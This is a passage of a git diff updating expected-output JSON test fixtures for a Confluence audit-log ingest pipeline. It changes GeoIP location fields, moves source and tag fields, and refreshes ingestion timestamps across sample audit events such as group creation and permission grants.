@@ -17589,7 +16521,7 @@ }, "event": { "action": "audit.logging.summary.user.updated", - "ingested": "2021-12-08T15:08:08.222720666Z", + "ingested": "2021-12-14T14:34:31.513279982Z", "original": "{\"timestamp\":\"2021-11-28T17:05:37.158Z\",\"author\":{\"name\":\"Joe Bob\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin123\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.updated\",\"action\":\"User details updated\"},\"affectedObjects\":[{\"name\":\"asdf asdfasdf\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=asdf123\",\"id\":\"2c9680837d4a3682017d67821e520003\"}],\"changedValues\":[{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"from\":\"asdf\",\"to\":\"asdf asdfasdf\"}],\"source\":\"10.100.100.2\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 36ebad2a710..8b63864a6b6 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json 
@@ -38,20 +38,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -59,7 +53,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:09:09.045122167Z", + "ingested": "2021-12-14T14:34:52.859148619Z", "original": "{\"affectedObjects\":[{\"name\":\"Synchrony Interop Bootstrap Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624567,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -110,20 +104,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -131,7 +119,7 @@ }, "event": { "action": "audit.logging.summary.plugin.enabled", - "ingested": "2021-12-08T15:09:09.045126258Z", + "ingested": "2021-12-14T14:34:52.859151088Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Collaborative Editor Plugin\",\"type\":\"App\"}],\"auditType\":{\"action\":\"App enabled\",\"actionI18nKey\":\"audit.logging.summary.plugin.enabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Apps\",\"categoryI18nKey\":\"audit.logging.category.plugins\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624565,\"nano\":791000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -183,20 +171,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -204,7 +186,7 @@ }, "event": { "action": "audit.logging.summary.space.import", - "ingested": "2021-12-08T15:09:09.045128082Z", + "ingested": "2021-12-14T14:34:52.859151561Z", "original": "{\"affectedObjects\":[{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space import\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Import/Export\",\"categoryI18nKey\":\"audit.logging.category.import.export\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624569,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -347,20 +329,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -368,7 +344,7 @@ }, "event": { "action": "audit.logging.summary.directory.added", - "ingested": "2021-12-08T15:09:09.045129817Z", + "ingested": "2021-12-14T14:34:52.859151950Z", "original": "{\"affectedObjects\":[{\"name\":\"Confluence Internal Directory\",\"type\":\"Directory\"}],\"auditType\":{\"action\":\"User directory created\",\"actionI18nKey\":\"audit.logging.summary.directory.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"ID\",\"key\":\"ID\",\"to\":\"327681\"},{\"i18nKey\":\"Name\",\"key\":\"Name\",\"to\":\"Confluence Internal Directory\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"},{\"i18nKey\":\"Encryption type\",\"key\":\"Encryption type\",\"to\":\"atlassian-security\"},{\"i18nKey\":\"Description\",\"key\":\"Description\",\"to\":\"Confluence default internal directory\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"INTERNAL\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed 
operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":440000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -402,31 +378,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T23:43:21.536Z", "ecs": { "version": "1.12.0" 
@@ -442,9 +393,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:09:09.045131539Z", + "ingested": "2021-12-14T14:34:52.859152310Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":536000000},\"version\":\"1.0\"}", "type": [ "group", @@ -459,6 +426,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-administrators", "id": "confluence-administrators" 
@@ -485,31 +455,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T23:43:21.552Z", "ecs": { "version": "1.12.0" @@ -525,9 +470,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:09:09.045133245Z", + "ingested": "2021-12-14T14:34:52.859152663Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":552000000},\"version\":\"1.0\"}", "type": [ "group", @@ -542,6 +503,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-users", "id": "confluence-users" 
@@ -598,20 +562,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -619,7 +577,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045134925Z", + "ingested": "2021-12-14T14:34:52.859153019Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":592000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -690,20 +648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -711,7 +663,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045136626Z", + "ingested": "2021-12-14T14:34:52.859153414Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":620000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -782,20 +734,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -803,7 +749,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045138330Z", + "ingested": "2021-12-14T14:34:52.859153863Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":623000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -874,20 +820,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -895,7 +835,7 @@
},
"event": {
"action": "audit.logging.summary.global.permission.added",
- "ingested": "2021-12-08T15:09:09.045139987Z",
+ "ingested": "2021-12-14T14:34:52.859154224Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":627000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -966,20 +906,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -987,7 +921,7 @@
},
"event": {
"action": "audit.logging.summary.global.permission.added",
- "ingested": "2021-12-08T15:09:09.045141674Z",
+ "ingested": "2021-12-14T14:34:52.859154584Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":688000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1058,20 +992,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1079,7 +1007,7 @@
},
"event": {
"action": "audit.logging.summary.global.permission.added",
- "ingested": "2021-12-08T15:09:09.045143538Z",
+ "ingested": "2021-12-14T14:34:52.859155145Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":692000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1150,20 +1078,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1171,7 +1093,7 @@
},
"event": {
"action": "audit.logging.summary.global.permission.added",
- "ingested": "2021-12-08T15:09:09.045145231Z",
+ "ingested": "2021-12-14T14:34:52.859155524Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":694000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1242,20 +1164,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1263,7 +1179,7 @@
},
"event": {
"action": "audit.logging.summary.global.permission.added",
- "ingested": "2021-12-08T15:09:09.045146940Z",
+ "ingested": "2021-12-14T14:34:52.859155881Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":696000000},\"version\":\"1.0\"}",
"type": [
"admin",
@@ -1347,20 +1263,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1368,7 +1278,7 @@
},
"event": {
"action": "audit.logging.summary.user.created",
- "ingested": "2021-12-08T15:09:09.045148645Z",
+ "ingested": "2021-12-14T14:34:52.859156258Z",
"original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"test.user\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"admin\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":54000000},\"version\":\"1.0\"}",
"type": [
"user",
@@ -1443,20 +1353,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1464,7 +1368,7 @@
},
"event": {
"action": "audit.logging.summary.group.membership.added",
- "ingested": "2021-12-08T15:09:09.045150340Z",
+ "ingested": "2021-12-14T14:34:52.859156645Z",
"original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":147000000},\"version\":\"1.0\"}",
"type": [
"group",
@@ -1538,20 +1442,14 @@
"source": {
"geo": {
"continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
"country_iso_code": "GB",
"country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
"location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
}
},
"address": "81.2.69.143",
@@ -1559,7 +1457,7 @@
},
"event": {
"action": "audit.logging.summary.group.membership.added",
